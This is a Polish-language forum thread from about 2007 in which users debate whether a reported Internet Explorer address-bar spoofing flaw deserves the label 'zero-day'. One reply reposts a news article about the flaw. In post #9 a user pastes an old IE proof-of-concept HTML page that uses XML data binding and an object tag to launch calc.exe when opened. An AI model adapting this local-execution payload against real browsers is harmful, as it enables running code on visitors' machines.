Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 12

Temat: heh

  1. #1
    Zarejestrowany
    Jun 2006
    Postów
    85

    Domyślnie heh

    Wlasnie dostalem info, ze jedna ze stron informacyjnych podala taka informacja:

    [..]Najnowsza wersja Internet Explorera jest podatna na lukę typu zero-day[..]


    Nie wiem, czy to do dzialu 'hacking' czy 'humor'. Pozostawie bez dalszego komentarza.

  2. #2
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    też mi nowość...

  3. #3
    Zarejestrowany
    Jun 2006
    Postów
    85

    Domyślnie heh

    Może inaczej, bo widzę, że aluzja nie została zrozumiana.


    Definicja zero-day (wiki):
    http://en.wikipedia.org/wiki/Zero_day

  4. #4
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    czepiasz sie słówek

  5. #5
    Avatar Sardihan
    Sardihan jest offline Blastmaster
    Zarejestrowany
    Dec 2006
    Skąd
    polsza
    Postów
    747

    Domyślnie

    ani aluzji ani definicji PLEASE TRANSLATE

  6. #6
    Zarejestrowany
    Jul 2007
    Postów
    2

    Domyślnie

    Jako ze to moj pierwszy post więc chciałbym sie ze wszystkimi przywitac i od razu daje info

    Najnowsza wersja Internet Explorera jest podatna na lukę typu zero-day, która pozwala złośliwej stronie internetowej oszukać użytkownika wykorzystując do tego celu pasek adresu przeglądarki.

    Błąd, sklasyfikowany przez firmę Secunia jako „mało krytyczny”, związany jest z niewłaściwą pracą metody „document.open()” wykorzystywanej przy otwieraniu nowego okna i ładowania dokumentu określonego przez adres URL.

    W tym konkretnym przypadku użytkownicy odwiedzający złośliwą stronę internetową mogą chcieć zmienić oglądaną witrynę. Jeśli wykonają to poprzez wpisanie w pasku adresu nowe „miejsce docelowe”, mogą zostać przeniesieni do przygotowanego specjalnie przez cyberprzestępcę serwisu, mimo że na pasku adresu będzie widniał URL, który wpisali.

    „W przypadku tych ataków użytkownik jest przekonany, że opuścił przeglądaną stronę WWW, tymczasem jego przeglądarka wyświetla zawartość przygotowaną przez atakującego” - opowiada odkrywca luki, Michał Zalewski.

    Secunia radzi, aby internauci ograniczyli liczbę odwiedzin nieznanych stron internetowych. Luka, która wykorzystuje JavaScript, nie była testowana w przypadku Internet Explorera 6, wyjaśnił Zalewski.
    No i mała definicja tejze luki
    Luki zero-day są błędami w oprogramowaniu, które nie zostały szerzej ujawnione przez swoich odkrywców i w związku z tym nie zostały stworzone łatające je poprawki. Sytuacja taka jest bardzo niebezpieczna, gdyż naraża systemy na ataki, które nie zostaną wykryte. Atakujący mogą więc przez dłuższy czas bezkarnie manipulować danymi po włamaniu.
    Jak dalej mozna przeczytac
    Za informacje o lukach typu zero-day płacone są na czarnym rynku ogromne sumy.

    Niedawno podjęto próbę ukrócenia tego procederu, otwierając pierwszą legalną aukcję luk.

    Immunity również kupuje informacje dotyczące luk, aby chronić swoich własnych klientów. Firma nie chciała jednak ujawnić jakichkolwiek szczegółów związanych z tym procederem.

    Jak wynika ze statystyk, najkrócej „żyjąca” luka typu zero-day przetrwała w konspiracji 99 dni, podczas gdy „najstarsza” funkcjonowała bez załatania przez 1080 dni, czyli niemalże trzy lata.
    Pozdrawiam

  7. #7
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    !!! ROTFL !!!

    Jak dobrze pamietam z innych zrodel to ta 'informacja prasowa' dotyczy spostrzezen Michala Zalewskiego
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  8. #8
    Zarejestrowany
    Dec 2006
    Postów
    693

    Domyślnie

    exploler zawsze byl cienki...

  9. #9
    Zarejestrowany
    Jan 2007
    Skąd
    somewhere in time
    Postów
    510

    Domyślnie

    Michałowi pewnie chodzi oto że przeciez luki zero-day są lukami publicznie nie ogłoszonymi wiedzą onich tylko ich twórcy....
    no a na logike jak ktos juz oglosil / opublikowal ze jest taki bład w ie to to niemoze byc zero-day.....chyba ze opublikowal tylko to ze jest luka ale nie konkretnie jaka
    a pozatym ie jak sobie czytam mial w przeszlosci duzo luk
    wystarczy wpisac ten kod i w ie otworzyc...moze znane to moze nie....ale gdzies wyczytalem..(wyswietla sie kalkulator....tylko dziwi mnie ze jak bym zamienil calc.exe np na regedit.exe to nic sie nie dzieje )-znajdywanie takich bugow to jest kosmos normalnie opanowac to wszystko i szacunek dla tych co to opanowali- respekt


    <html>
    <head>
    <title>Running "c:/windows/system32/calc.exe"..</title>
    <link rel="stylesheet" href="../sec.css">
    </head>
    <body>
    Running "c:/windows/system32/calc.exe"..
    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <security>
    <exploit>
    <![CDATA[
    <object id="oFile"
    classid="clsid:11111111-1111-1111-1111-111111111111"
    codebase="c:/windows/system32/calc.exe"></object>
    ]]>
    </exploit>
    </security>
    </xml>
    </body>
    </html

  10. #10
    Avatar eMCe
    eMCe jest offline Emil Grzegorz Gubała
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

    Domyślnie

    i co sie tak dziwicie
    nie wiecie jaka była myśl przewodnia twórców IE?
    ty oglądasz z kompa net z netu oglądają ci kompa

    pozatym wszystko jest pod kontrolą Microsoft wie o tym za pół roku będzie poprawka załata ona błędy i jednocześnie będzie zawierała kolejne
    Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )

Strona 1 z 2 12 OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52